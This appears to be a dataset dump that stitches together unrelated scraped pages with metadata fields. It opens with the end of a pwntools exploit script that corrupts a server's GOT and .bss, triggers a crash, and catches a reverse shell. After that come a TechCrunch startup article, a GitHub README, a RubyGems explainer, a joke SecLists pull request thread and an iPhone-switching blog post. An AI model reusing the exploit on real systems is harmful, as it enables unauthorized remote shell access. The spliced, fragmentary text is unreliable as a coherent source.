got += p64(0x41393e) # overwriting time() w/ &TCP_SEND()
got += p64(0x400534) * 3 # ret
payload += got
payload += randoms(1792)
payload += p64(0x63af70) # filename
payload += randoms(356)
payload += p64(0x63af68) # &ptr to binary to launch
payload += randoms(4436)
payload += p64(0x6339F8) # -> FILE *struct (to fake struct)
payload += randoms(520)
payload += p64(0x63af78) # @ of (rem_file+24) (ARGV0)
payload += randoms(248)
payload += p64(0x63afa0) # ptr to shell cmd string (ARGV2)
payload += randoms(30360)
payload += p64(0x63af88) # sig_fin() memcpy dst
payload += randoms(8696)
# conn.sendline('USER LEXFO')
# conn.readuntil('please?')
# Overwrite `.bss`
conn.sendline(randoms(5) + payload) # WARNING: sendline() adds an extra '\n'
log.success('Filled lit_parm->buf with good values.')
conn.readuntil(')')
# conn.clean()
# Triggering SIGSEGV (handler!) for arbitrary write primitive
log.info(
'Making subprocess crash to obtain sig_fin() poison .bss and preempt normal flow.'
)
conn.send('ALLO 1')
bc.wait_for_connection()
conn.clean()
conn.close()
time.sleep(1)
log.success('Got shell! Enj0y')
bc.interactive()
bc.close()
``` | true | true | true | null | 2024-10-12 00:00:00 | 2020-03-24 00:00:00 | null | null | null | null | null | null |
2,463,177 | http://www.telegraph.co.uk/science/8457193/Happiness-is-U-shaped-...-which-explains-why-the-middle-aged-are-grumpy.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,266,838 | https://techcrunch.com/2020/02/06/snafu-records-is-a-record-label-using-algorithms-to-find-the-next-big-artist/ | Snafu Records is a music label using algorithms to find its next big artist | TechCrunch | Anthony Ha | Snafu Records is bringing a new approach to finding musical talent — founder and CEO Ankit Desai described the Los Angeles-headquartered startup as “the first full-service, AI-enabled record label.”
It’s a world that Desai knows well, having spent the past five years working on digital and streaming strategy at Capitol Records and Universal Music Group. He argued that there’s still a vast pool of musical talent that the record labels are ill-equipped to tap into.
“If there’s some girl in Indonesia whose music the world is dying to hear, they’re never going to get the chance,” he said. “The bridge to connect her to the world doesn’t exist today. The music business is entrenched in a very old way of working, finding artists through word-of-mouth.”
There are other companies like Chartmetric creating software to help the labels scout artists, but Desai said, “I used to be the one buying the service. What always ended up happening was that we were trying to put 21st century technology into a 20th century machine.”
The machine, in other words, is the record label itself. So he decided to create a label of his own — Snafu Records, which is officially launching today.
The startup is also announcing that it has raised $2.9 million in seed funding led by TrueSight Ventures, with participation from Day One Ventures, ABBA’s Agnetha Fältskog, Spotify’s John Bonten, William Morris’ Samanta Hegedus Stewart, Soundboks founder Jesper Theil Thomsen, Headstart.io founder Nicholas Shekerdemian and others.
The Snafu approach, Desai said, uses technology “to essentially turn everyone listening to music into a talent scout on our behalf.”
The company’s algorithms are supposedly looking at around 150,000 tracks from unsigned artists each week on services like YouTube, Instagram and SoundCloud, and evaluating them based on listener engagement, listener sentiment and the music itself — Desai said the sweet spot is to be 70 or 75% similar to the songs on Spotify’s top 200 list, so that the music sounds like what’s already popular, while also doing just enough to “break the mold.”
This analysis is then translated into a score, which Snafu uses to go “from this firehose of music, distill it down to 15 or 20 per week, and then the human [team] gets involved.”
The goal is to sign musicians as Snafu artists, who then get access the company’s industry expertise (including advice from the label’s head of creative Carl Falk, who’s written songs for Madonna, One Direction and Nicki Minaj) and marketing support in exchange for a share of streaming revenue. Desai added that Snafu will share more of the revenue with artists and lock them in for shorter periods of time than a standard record contract.
Asked whether streaming (as opposed to touring or merchandising) will provide enough money for Snafu to build a big business, Desai said, “Economics-wise, streaming sometimes does get a bad rap sometimes. It’s a bit misunderstood — there’s still just as many artists making really, really good numbers through streaming, it’s just a different kind of artist.”
And while Snafu is only officially launching today, it has already signed 16 artists, including the Little Rock-based duo Joan and the jazz musician Mishcatt, whose song “Fade Away” has been streamed 5 million times in the five weeks since it was released.
“There’s a major opportunity for Ankit and the Snafu team to build a new innovative and enduring music label at the intersection of technology and deep industry expertise,” said Hampus Monthan Nordenskjöld, founding partner at TrueSight Ventures, in a statement. “The music industry is going through a tectonic shift and we’re extremely excited to work with Snafu as they redefine what it means to be a music label in the 21st century.”
Spotify is buying The Ringer to boost its sports podcast content | true | true | true | Snafu Records is bringing a new approach to finding musical talent — founder and CEO Ankit Desai described the Los Angeles-headquartered startup as "the | 2024-10-12 00:00:00 | 2020-02-06 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
31,619,784 | https://github.com/jkirsteins/Wordlike/tree/ipad | GitHub - jkirsteins/Wordlike at ipad | Jkirsteins | A game written in SwiftUI using Swift Playgrounds 4.
The objective is to guess a word in 6 tries. A new round starts every day.
Available languages:
- English
- Latvian
- French
- Install Swift Playgrounds 4
- Clone this repository on your iPad directly into the Swift Playgrounds 4 storage
Then open Playgrounds, and the application should be available.
- English/British translations taken from <git@github.com:hyperreality/American-British-English-Translator.git>
- Latvian word list preparation relied on word analysis from https://github.com/PeterisP/LVTagger.git | true | true | true | A word guessing game written in SwiftUI in Playgrounds - GitHub - jkirsteins/Wordlike at ipad | 2024-10-12 00:00:00 | 2022-02-20 00:00:00 | https://opengraph.githubassets.com/44b89493b55d498df9b927f15a0fb4d5c2c0320a0d64beccc22ce60bfc8d0c85/jkirsteins/Wordlike | object | github.com | GitHub | null | null |
21,218,309 | https://deepmind.com/blog/article/Causal_Bayesian_Networks | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,388,956 | http://www.justinweiss.com/blog/2014/09/29/how-do-gems-work/ | How do gems work? | Justin Weiss | Most of the time, gems in Ruby Just Work. But there’s a big problem with Ruby magic: when things go wrong, it’s hard to find out why.
You won’t often run into problems with your gems. But when you do, Google is surprisingly unhelpful. The error messages are generic, so they could have one of many different causes. And if you don’t understand how gems actually work with Ruby, you’re going to have a tough time debugging these problems on your own.
Gems might seem magical. But with a little investigation, they’re pretty easy to understand.
What does gem install do?
A Ruby gem is just some code zipped up with a little extra data. You can see the code inside a gem with gem unpack:
gem install, in its simplest form, does something kind of like this. It grabs the gem and puts its files into a special directory on your system. You can see where gem install will install your gems if you run gem environment (look for the INSTALLATION DIRECTORY: line):
All of your installed gem code will be there, under the gems directory.
These paths vary from system to system, and they also depend on how you installed Ruby (rvm is different from Homebrew, which is different from rbenv, and so on). So gem environment will be helpful when you want to know where your gems’ code lives.
How does gem code get required?
To help you use the code inside of your gems, RubyGems overrides Ruby’s require method. (It does this in core_ext/kernel_require.rb). The comment is pretty clear:
For example, say you wanted to load active_support. RubyGems will try to require it using Ruby’s require method. That gives you this error:
Then, it activates the gem, which adds the code inside the gem to Ruby’s load path (the directories you can require files from):
Now that active_support is on the load path, you can require the files in the gem just like any other piece of Ruby code. You can even use the original version of require, the one that was overwritten by RubyGems:
Cool!
A little knowledge goes a long way
RubyGems might seem complicated. But at its most basic level, it’s just managing Ruby’s load path for you. That’s not to say it’s all easy. I didn’t cover how RubyGems manages version conflicts between gems, gem binaries (like rails and rake), C extensions, and lots of other stuff.
But knowing RubyGems even at this surface level will help out a lot. With a little code reading and playing in irb, you’ll be able to dive into the source of your gems. You can understand where your gems live, so you can make sure that RubyGems knows about them. And once you know how gems are loaded, you can dig into some crazy-looking loading problems.
If you’d like to learn more about how Rails and Bundler handle gems, check out this article: How does Rails handle gems?.
Pushing through tutorials, and still not learning anything?
Have you slogged through the same guide three times and still don't know how to build a real app?
In this free 7-day Rails course, you'll learn specific steps to start your own Rails apps — without giving up, and without being overwhelmed.
You'll also discover the fastest way to learn new Rails features with your 32-page sample of Practicing Rails: Learn Rails Without Being Overwhelmed.
Sign up below to get started:
Thanks! You should get an email from me in a few minutes with your free sample chapter.
While you wait, I'd love to <a href="https://mastodon.justinweiss.com/@justin">meet you on Mastodon</a>. You can learn a little bit more about Ruby each day -- I share the best Ruby and Rails articles I read. And it's great for short conversations and answering questions about software development. | true | true | true | null | 2024-10-12 00:00:00 | 2014-05-08 00:00:00 | website | justinweiss.com | Justin Weiss | null | null |
|
5,575,738 | https://www.fbpuewue.com/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
10,556,332 | https://myelin.io/how-to-minimize-procrastination | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,009,459 | https://github.com/danielmiessler/SecLists/pull/155 | Remove my password from lists so hackers won't be able to hack me by assafnativ · Pull Request #155 · danielmiessler/SecLists | Danielmiessler | -
Notifications
You must be signed in to change notification settings - Fork 23.8k
## New issue
**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
# Remove my password from lists so hackers won't be able to hack me #155
## Conversation
**mitcom**reviewed
@@ -344,7 +344,6 @@ blue | |||
liverpool | |||
theman | |||
bandit | |||
dolphins |
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@assafnativ please remember to update the filename. `10_million_password_list_top_1000.txt`
is not accurate right now, actually there are only 999 passwords
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I think it should be renamed to `10_million_password_list_top_1000_except_dolphins.txt`
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Привет от дев нулла)0
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Golden
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Also any sites tested against the revised list should include some kind of logo to confirm that Dolphin is now allowed as a safe password. Might I suggest: http://savedolphins.eii.org/files/dsf/Dolphin_Safe.png
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@liuzhiyuan1993 哦哦,谢谢ଲଇଉକ
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There is a idiom in China, "此地無銀三百兩", which means telling your secret yourself.
For security, you had better close the issue and fully delete it if possible.
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
To add on to the translation of the idiom, that phrase literally means writing a sign that says "I did NOT bury 300 grand in this spot"
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Might I suggest: http://savedolphins.eii.org/files/dsf/Dolphin_Safe.png
I thinks they can safely merge it. The issue is the dolphin-proof now. 😄
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The dolphins have communicated to us members of the Fourth International Posadist that they sign off on this request, as exposing them before their plan reaches completion could jeopardize the workers of the world. 🐋
This is a security hole. This pull request should be accepted as soon as possible. |
I'm also affected by this, please merge ASAP |
@assafnativ @rooterkyberian could you provide any testing data like service addresses and logins so we could check and test to estimate the real impact of this change? |
ROTFLMAO! |
What the.....i don’t think this will solve the issue
…On Thu, 21 Dec 2017 at 19:33, Krzysztof Staniorowski < ***@***.***> wrote:
ROTFLMAO!
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ADo_cTu0FfmnSQSxs34YcAbHMKk11h4vks5tClAygaJpZM4RJt0h>
.
|
@mitcom you mean, like the publicly available email address and blog address on his github page? |
@assafnativ They see me trollin, they hatin... |
4 random words are really easier than the gibberish? |
**dmytrokyrychuk**approved these changes
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks good 👍
@KyrychukD wtf |
Can you please add my password To this list so I can test it against insecure services.. |
If anybody here is affected too I can suggest temporally change the password to one from https://mostsecure.pw/ |
Is dolphin1 on the list. ;) That's secure as it has a 1 |
Dolphin1! |
Ah good idea, hackers will never try that.. |
Same here.
|
Is my password hunter2 safe |
@dsuurlant I just see ******* |
is my password thisissparta safe???????? |
Absolutely, if changed! |
This is gold.
…Sent from my iPhone
On Dec 21, 2017, at 10:39 AM, Kishan Kumar ***@***.***> wrote:
is my password thisissparta safe????????
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
|
Change it to dolphins, dolphins is safe now
21.12.2017 16:42 "Thaddée Tyl" <notifications@github.com> napisał(a):
… is my password thisissparta safe????????
Absolutely, if changed!
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ACgiM34NXJyW-4C4DTitmf0OrwdXCd9Mks5tCnxqgaJpZM4RJt0h>
.
|
nice, my 122112 password still alive... |
At least I know Alligator1 will never be guessed. |
**nebril**approved these changes
There was a problem hiding this comment.
### Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can confirm, is safe.
@assafnativ, you had the same password as mine? |
@0xmohit not anymore, I've just change yours |
Hahahhahaha pure genius |
If there are so many approvals, why isn't this merged yet? |
**PatrickJS**approved these changes
I hoped that this pull request would die at some point, but there's still something going on(even after two(!) months)... |
**Ekultek**approved these changes
@jens1o of course it is, it was unexpected and pretty funny. Even with all these approved, there is of course no merge, even though @assafnativ probably wants a merge. |
Thread muted. (didn't know it was an option till now) |
|
Spam
… On Feb 27, 2018, at 3:56 PM, César Del Solar ***@***.***> wrote:
is annoyed about all the comment spam
generates another piece of spam complaining about the spam
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or mute the thread.
|
S P A M |
Jezz ! For technologists we are not very good at this internet thing, are we ? The correct way to use a thread like this, is to participate to it and then mute it. This let the early participants, who eventually get tired of subsequent updates, not to be spammed [1], while allowing the genuine new people discovering this to be a part of it and to experience it with the same amusement as we all, old timers, did. Easy. [1] I personally don't feel that, I will never mute this as I love it! And as far as my inbox is concerned I discovered my email client's delete button a long time ago, but I understand that's not the case of everybody. |
I've been watching this since the first week and commenting on it since, I didn't mute it because it is still a great issue. If you really care that much, you can just read this to get rid of the notifications since you clearly do not know how to. |
👍 Although removal of this password would make you, and many marine biologists, more secure, we're going to have to decline at this time. : ) Best thread ever. |
It finally died! Good Job everyone! |
That was fun :) |
My password is |
* Performance: read the response dump line by line instead of loading the whole thing in memory The response from the service will grow over time. There is no way to get passwords [unpwned](danielmiessler/SecLists#155), so we can safely assume the list will keep growing, adding more an more new hashes. One day it will grow large enough to start taking down servers, when users "DDoS" applications with known "big" pwned password hash prefixes. This PR switches from "load everything to memory and find our hash" to "fetch data in chunks, and process line by line". * Remove regular expressions usage in favour of start_with? In Ruby `start_with?` is heavily optimized compared to regular expressions (more than 2 times faster). This PR replaces regular expressions with `start_with?` ``` 13.103359 0.734251 13.837610 ( 14.620959) 13.238428 0.742140 13.980568 ( 14.506166) 12.836573 0.729563 13.566136 ( 14.191792) 12.408245 0.642944 13.051189 ( 13.333299) ```
Do you know how does Git work? |
Oh man, this was just hilarious to scroll through. Especially since I was scrolling EDIT: But still, what if someone uses their ******** in the middle of a sentence? |
|
stop making new notifications, this page takes ages to load lol |
Thanks friend ... I will be glad to know you too well Mr.. Please can
you contact Me on what's app or any other social platform.. Am a noob
.. And I will be merry to gain from you...
…On Wed, Sep 5, 2018, 08:30 Jens Hausdorf ***@***.***> wrote:
stop making new notifications, this pages takes ages to load lol
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AhMBZWnRolxVID49T8yy6eDlC2ZEe4ijks5uX32zgaJpZM4RJt0h>
.
|
Thanks for notify me also
…On Wed, Sep 5, 2018, 08:30 Jens Hausdorf ***@***.***> wrote:
stop making new notifications, this pages takes ages to load lol
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AhMBZWnRolxVID49T8yy6eDlC2ZEe4ijks5uX32zgaJpZM4RJt0h>
.
|
Thank you, I almost forgot about this. |
pls bobs
…On Wed, Sep 5, 2018 at 6:12 AM Flowy ***@***.***> wrote:
Thank you, I almost forgot about this.
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AAjuZuz6PpkXqS-dmKObe_I-vNB7to1gks5uX6OUgaJpZM4RJt0h>
.
|
I heard about magic button called "unsubscribe". |
**resolved**and limited conversation to collaborators
No description provided. | true | true | true | null | 2024-10-12 00:00:00 | 2017-12-21 00:00:00 | https://opengraph.githubassets.com/36749899e839b476613b7f2a539102b7fb8af6502e726358019505ff509068cd/danielmiessler/SecLists/pull/155 | object | github.com | GitHub | null | null |
10,084,754 | http://casabona.org/2015/08/2-months-with-an-iphone/ | 2 Months with an iPhone | Casabona | # 2 Months with an iPhone
I wrote perhaps my most popular blog post ever just over 2 months ago. I talked about how I bought, used, and subsequently didn’t like the iPhone 6. I would be sticking with Android…or so I thought. Shortly after that post got popular, I was compelled to take another look at iOS.
There were 2 factors in my first trial with the iPhone that stacked the odds against me ever liking the device. I wasn’t using it as my only full time device, and I didn’t use all the features.
The first factor made my user experience with the iPhone more like this: “Ugh. I don’t like this; I’m just going to do it on my Android phone.” That means I never used the iPhone enough to not have a frustrating (read: *different* from Android) experience. The second factor was the real kicker. I was excluding the features that make using iOS great. I didn’t turn on iMessage. I wasn’t using Passbook or Apple Pay. Handoff was something that was hands-off for me (pun totally intended).
## Making the Switch
After 2 months fully immersed iPhone usage, I’m confident that this will be my primary device. At least for the foreseeable future. This means I have a lot of words I need to eat.
I’ve been an Android user and a big voice for the Android Army since the first devices were available. I will still have Android devices too; I need them for testing. But for every day use, I will be making the switch to the iPhone. Here’s why.
### Incredible Battery Life
This is by far the best feature. The battery life is better than any Android device I’ve ever used. I’m never worried about charging it during the day. I don’t have to turn services off or downloading some God-forsaken app. I’ve gone 36 hours without charging it and still had plenty of battery life left.
Recently I was in NYC, unplugged the phone at 7:30am and used it all day, until about 2am. I made calls, got walking directions, checked the time, read, played games, and more. At 2am I still had 46% left. On the subway ride, I lost 3% battery compared to the 20% my friend lost on his Moto X.
### Really Nice Photos
I never put an emphasis on taking good photos on my phone. I’ve always used it for photos, but it wasn’t always a priority for me. Then I started doing a lot more stuff where I wanted to take photos. I was traveling, hanging out with my lady, exploring. I’m not a good photographer, so I never have my DSLR with me. I rely on my phone.
Whatever iOS does in software to make photos look good is magic. For a point-and-shoot, it’s fantastic. The photos are clear and crisp and usually done on the first try. That’s the kind of use I like to see.
### Accessories
It’s nice to have a device where I know I will be able to get great accessories. With the OnePlus One, I would walk into stores and people didn’t even know what I was talking about. They definitely didn’t carry accessories for it. With the iPhone, that’s not a problem.
There are countless cases, stands, add-ons, and more that work well with the iPhone. A few of my favorite are:
- Twelve South HiRise
- Star Wars bumper case I got from Disney World
- TuneBand for iPhone
With the bumper, it’s nice having a case that barely adds any bulk. The reason I never use one with my Android devices is that exact reason. Most cases take away from the form factor, and that’s frustrating to me.
## The iOS Ecosystem
Aside from those 3 big reasons, iOS has a lot of convenient, well working features built-in to it.
While trying to explain what I liked about using the phone to a friend (about 6 weeks in), I worded it like this:
There are a lot of small, indescribable interactions that make using the iPhone great.
It’s not something that I’d be able to verbalize to someone when trying to convince them to switch. They’d have to actually use the device to see what I mean.
I don’t exactly know what it is, but certain interactions just *feel* right. I can’t put my finger on it (this pun was not intended). It’s not something I could use in an argument with “Year Ago, Android-only Joe.”
Then there are the things I can explain.
### iMessage and Handoff
Since I use a Mac, having these features turned on is absolutely fantastic. I can text and call from my phone (or iPad). If I’m using Chrome, Safari, or other apps that support Handoff, I can switch seamlessly to my computer.
And yes, I know. You can get MightyText. You can do the same thing in Chrome on Android. Something about using Hangouts. *I know*. I use Android. I used it exclusively for 6 years and have thoroughly explored this space. You might even know about MightText because of me. I’m telling you, it’s better on iOS. It’s more integrated. I don’t have to download a 3rd party app. I don’t have to fight or tab or click. As much as it kills me to say this, it **just works**. It’s so convenient and it works really, really well.
### Passbook, Apple Pay, and Touch ID
Passbook, where have you been all my life? When I had a University-issued iPhone 4 and Passbook was brand new, it was terrible. Nothing worked with it. What a difference a couple of years make! It might be my favorite bundled app.
I add gift cards, plane tickets, concert tickets, and more, and Passbook keeps them all in one place for me. If I’m close to the airport, or it’s almost time for the concert to start, Passbook knows. It puts that ticket right on my lock screen; my ticket is accessible with one swipe. I’m gushing, but it’s much deserved. It’s an incredible feature.
And Apple Pay. Man; when it was first announced, I snobbishly said Google was there first with Google Wallet. And I’m right of-course. It’s a sin that it took iOS this long to get NFC support, and a bigger sin that right now, only Apple Pay works with. That said, let me tell you how I have to use Google Wallet:
**Open App -> Put in PIN -> Find Card -> Open Card -> Hold Phone to Reader**
Here’s how Apple Pay Works:
**Hold Phone to reader with thumb on Touch ID**
That’s it. I don’t have to open any app. I just have to hold my phone to a reader. This is the way it should be.
And Touch ID. I missjudged that. Now I’m of the opinion that if an app I have to login to doesn’t support Touch ID, the app isn’t worth having. It works well. AND I figured out that I can add more than one finger print to it.
### Getting Updates when they come out
No more waiting *forever* to get OS updates. The day iOS 9 drops, I will have it on my phone. Do you know how long it took me to get Lollipop? I had to buy a new phone. Then I had to nearly brick that phone during an upgrade.
## It’s not Perfect
There are still a few things I miss about Android that aren’t on iOS.
### Customization
I miss tinkering a bit, but not as much as I though. There’s a lot to be said about customizing your experience beyond. I like that I’m not crushing time by tinkering, but I loved widgets. The Notification bar and extended functionality are nice, but not “customizable widgets” nice.
As a web developer, I can appreciate why Apple did this. As a user, I kind of feel it’s my phone, and I should be able to do what I want with it. However, they spent a ton of time making their design perfect, and they don’t want people mucking it up. It’s a design decision that I understand, at the very least.
### Sharing Needs Work
Android is far better at this. Apple’s sharing is coming along, but it’s not nearly as integrated with other apps as Android is. I didn’t realized just how much I used that function until I started using iOS. Sharing can be downright frustrating at times. I’m told that may get better with iOS 9. But right now, sharing a photo from Camera to Instagram or anything to Dropbox takes too long.
### The Back Button
Yes, I know I said this last time. But after 2+ months, it’s still something I miss. I can double-tap the home button to bring up a list of apps, but it’s not the same as a dedicated back button. I feel like it makes bouncing around apps a lot easier. Maybe now that iOS supports multitasking, some solution will emerge. Until then, I’m excited for my Halo Back Screen Protector to come.
### Clearing Apps
This is a bit of a pain in the butt, especially if I have a lot open. I miss the “Clear All” button that comes on Android devices. A small feature, but a deeply appreciated and time-saving one.
## Some Final Thoughts
This has been a strange experience for me. I’ve been such an outspoken proponent of Android. It was more like anti-iPhone. That means making the switch has been one of begrudging acceptance. At first, I didn’t like that I liked it.
But as I use the iPhone more and see how well it actually works, it’s clear that Android is great for some things. But needs to mature in other aspects. And I think Google knows that too. The change in treatment of Android over the last few years has been noticeable. It’s like Google said, *“GUYS. We need to fix this mess.”*
But still. As I write this post using iA Writer on my iPad, I know I will be able to proof it on my iPhone while I wait at Baggage Claim. Then I will hit publish from my Mac, all without having to push a sync or refresh button. And that’s some powerful stuff.
I had the iPhone 6 plus, great one and I liked the fact as not much runs in the background like android does it does note need the 3gb ram my Note 4 has now. The note 4 has problems with slowing down for a while even when not doing stuff that’s to tasking
Only sold my iPhone to put towards a used car. To much bloat on Samsung phones mines showing it needs 7.3gb just for the OS. Has option to uninstall built in apps but that just removes latest update then disables it wtf.
Android is more like windows I feel it’s not as custom made for its hardware as Apple makes it iOS. As you get a dual core cpu and 1gb of ram and it’s just as good as many “high end” android phones. That like the note 4 are 2.7ghz quad core with 3gb ram ?, My son has a LG G3 and that gets hot just playing videos etc.
Just to touch on your point about clearing apps.
You really don’t have to.
Memory management on iOS is so much better than Android. I have an OPO as well as a Galaxy S6 and yes, you will run into problems if you don’t clear out apps from running. But on the iPhone… just let it go. They aren’t impacting your memory or performance.
No need to “clear” apps in iOS. Just because your recent apps show at the bottom when you double tap the home button doesn’t mean they’re running or taking any resources. Think of it more as a “recently used” area. The most recent may still be running to facilitate faster app switching, but as your iPhone needs more resources, it’ll quit the oldest app and take what it needs.
As BernDog said, you don’t need to clear apps. Just let them open. They don’t waste resources and they will reopen faster.
As for the “back button”, wait for IOS 9. You can even try it now if you subscribe to the public beta.
If only Apple would build in wireless charging. I absolutely love not plugging my S5 into anything. Just set it on the charging pad.
Re:dedicated back button.
In iOS 9 (in the beta) there is an option to go back to the previous app (button/text at the top of the screen).
Greetings,
Thanks for an excellent article. I would like to make a note on one thing you wrote:
“It’s a sin that it took iOS this long to get NFC support,”
There is a reason for this. As I write in a post of my own (below), Apple has a certain M.O. for how it deals with technology. In particular, it does not release new technology until it thinks:
1- the tech itself is mature enough, and
2- it is ready with the proper software experience. (Yes, there have been some notable snafus with this.)
So let’s examine the NFC/ApplePay issue. Simply put, inclusion of an NFC system was useless if not supported by software. Software system was not available any earlier.
The key here is the importance of security for a payment system. This is not an area that allows for any errors at all. Compromised data would be costly for all involved. Additionally, the ApplePay system required the buy-in of card companies that were not going to do so unless convinced of security.
So – Apple first need to have a secure TouchID. This was not possible until the tech was available – developed and tested. Then Apple needed to test the system. What many people do not realize is that they were doing this in real-world application for a year prior to release of ApplePay.
When Apple released TouchID with the 5s, it included the ability to buy from iTunes and the App store with TouchID – essentially this was baby ApplePay.
And this is precisely Apple’s MO – test in a limited capacity before moving to more general application. They did the same with the original iPhone. Features such as cut/paste were not included, precisely because it presented security risks and greatly complicated the real-world debugging. The same with release on ATT only. The limited exposure gave them a more reliable system, and allowed them to refine the product in controlable environment.
Clearly Apple has the most secure pay system available. The only reason is that they took the time to develop it until they were convinced it was ready.
Best regards – JMM
Link: http://seekingalpha.com/article/2600885-how-apple-pay-reveals-apples-m-o
I’m a payments architect and have worked at many well known and global companies. I know Android and iOS quite well.
As far as payments go there was not sufficient NFV reader support to make it worthwhile. Few vendors had them or wanted to buy them. This was a perfect time for Apple to introduce NFC because vendors are buying new readers for the new chip and pin cards and most also do NFC.
Google Wallet is a joke. It has cost Google millions. It is not as secure at Apple Pay/Touch ID/iOS and Google decoupled Google Wallet from NFC in a desperate effort to try to get people to use it.
The demographics of Android users are not very exciting to retailers either. They don’t buy things.
I have had exactly the same experience as the writer. I use a S6
And have had the iPhone 6 plus from release. I have public beta 3 Ios 9 running on both my iPhone and I pad air and it’s a massive improvement and free to install and totally stable. The back button issue you mentioned I’d addressed in Ios 9 to some extent. All in all iIuse my iPhone as my daily driver with my s6 and nexus 9 filling in the blanks, which by the way get less with each update of IOS
Well my friend, I enjoyed reading your post, and I am writing to tell you: Fear not, for Phil Schiller himself has read it and has tweeted it, and that’s how I found it. Apple has read and heard all what you said, and I hope they take all the iOS improvements or shortcomings you mentioned into consideration in very near future iOS updates.
I personally have a feeling that iOS 10 is going to change everything all over again.
Clearing apps from multi-tasking is actually more of a battery killer than leaving them running. They’re suspended and held in memory and having the phone re-open them each time uses more battery power for the phone to re-load all of the app again rather than just un-suspending it – that’s what I’ve heard and read a few times when trying to look for ways to extend battery life.
iOS9 brings more battery saving software features as well as a low power more that really keeps the battery from draining for over 2 days on a single charge 🙂
And you didn’t even mention security from hacking eg. Stagefright:
https://en.m.wikipedia.org/wiki/Stagefright_(bug)
Where do you find compatible gift cards & (concert) tickets for Passbook??
Does anyone know which app & which stores have gift cards that’s compatible with Passbook please?
Thanks
There are priorities that any smartphone user looks at. May be the things that you listed downs as Pros of Apple over Android are really Pros. But the way Apple handles media files (photos videos) why do u alwyas have to sync your device with itunes to play a song man?? Why cant u download a video or song from any website and without even thinkig..play it! Come on! and the inability of an Apple device to Share field using Bluetooth or WiFi direct of NFC is a let down. Why should Apple have it’s own charging cables? Why can’t it go with industry standard micro USB ports? Where is the expandable memory? give me a break..!
Congrats! While you waiting for HALO BACK — you can go back with back-swiping gesture from the left edge of your screen. It works almost everywhere.
rajb2r,
1) You don’t need a PC with iTunes to manage your media. That was true for iPod (and it was great) and early versions of iOS. There’s dedicated Photos app for Mac and it works even in web browser on iCloud.com You don’t have to do anything, photos sync automatically and even deleting itself from the device if you have not enough space.
2) You are free to use any music player. You can download files in Safari and send them to your custom music player.
3) If you use Apples’ Music app, it doesn’t require iTunes to sync your music. You can download it from the iTunes Store or Apple Music right on the device.
4) You can download video from any website and open it with many third party video players, such as VLC.
5) You can share files wirelessly using AirDrop — it’s uses Bluetooth 4.0 for handshaking and Wi-Fi for hi-speed transferring.
6) Apples Lightning cable is light years ahead of Mini USB. It looks better, feels better, it’s better for nature and mostly important – it is reversible, you can plug in from the both sides. It also can transfer audio when you using dock.
7) There’s not expandable memory. Just get the right size for you. It’s a plus, you don’t have to manage two separate storages — device and card, don’t have to decide where put your data. It also makes device slimmer and stronger.
If you really miss customization you can try jailbreaking. I’m a huge Apple “fanboy” yet I can’t think of an iPhone or iPad I’ve owned I haven’t jailbroken at some point. Also as for the back button you can use a gesture. For example when you’re in safari if you want to go back a page put your finger at the left edge of the screen and rapidly move it towards the right side, and this will take you back. I find this works in most apps like Settings, Music, Safari, etc.
Unless of course you mean going back to the previous app, iOS 9 solves that (very annoyingly) I run the beta and it puts a “back to last app” button right where my carrier should be. It drives me insane, because I like to see my bars. I understand some people want this feature, but I do not. I wish Apple would give us the option to turn it off.
Great post.
You can swipe to the right in most apps instead of needing to tap the upper left hand button, and that will pop the current view controller. It’s not a back button like Android, but it’s convenient.
Honestly though, your other gripes can be fixed with a jailbreak. Here’s some examples:
1. You can download tweaks that add a “clear all apps” button.
2. You can customize your phone with multiple themes and apply them with Winterboard, as well as a plethora of existing visual tweaks.
3. You can assign gestures to do virtually anything with Activator? Want to compose and post to Twitter with a swipe on the status bar? Done. Want to disable some services when you reach 20% battery? You got it.
4. You can lock any app with Touch ID, as well as control center toggles.
5. Many multitasking replacements (such as having a 3×3 grid of app cards).
6. Specific tweaks to enhance many apps (Safari, Messages, Music, Youtube, etc….)
7. Watching videos in PiP mode while doing other tasks with VideoPane.
